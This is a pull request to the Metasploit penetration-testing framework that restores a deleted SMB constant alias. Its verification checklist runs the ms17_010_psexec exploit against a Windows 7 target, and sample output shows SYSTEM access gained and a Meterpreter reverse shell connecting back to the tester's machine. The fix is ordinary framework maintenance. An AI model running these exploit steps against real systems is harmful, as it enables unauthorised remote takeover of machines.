### PR TITLE
Revert deleted code from #9986.  See issue #9993

### DIFF
--- a/lib/msf/core/exploit/smb/client.rb
+++ b/lib/msf/core/exploit/smb/client.rb
@@ -16,6 +16,8 @@ module Msf
       include Msf::Exploit::Remote::Tcp
       include Msf::Exploit::Remote::NTLM::Client
 
+      CONST  = Rex::Proto::SMB::Constants
+
       # Alias over the Rex DCERPC protocol modules
       DCERPCPacket   = Rex::Proto::DCERPC::Packet
       DCERPCClient   = Rex::Proto::DCERPC::Client


### PR DESCRIPTION
This change returns the `CONST` variable which was removed in #9986.  See the following issue for the problem and troubleshooting methodology:

Fixes: https://github.com/rapid7/metasploit-framework/issues/9993

## Verification

- [ ] Spin up a Win7 target that is vulnerable to `ms17_010_psexec`
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms17_010_psexec`
- [ ] `set RHOST {WINDOWS_7_TARGET}`
- [ ] `set SMBUser {USERNAME}`
- [ ] `set SMBPass {PASSWORD}`
- [ ] `run`
- [ ] Observe something similar to the following:

```
[*] Started reverse TCP handler on 192.168.69.1:4444
[*] 192.168.69.7:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[*] 192.168.69.7:445 - Built a write-what-where primitive...
[+] 192.168.69.7:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.69.7:445 - Selecting PowerShell target
[*] 192.168.69.7:445 - Executing the payload...
[+] 192.168.69.7:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.69.7
[*] Meterpreter session 1 opened (192.168.69.1:4444 -> 192.168.69.7:49262) at 2018-05-08 16:22:19 -0500

meterpreter >
```

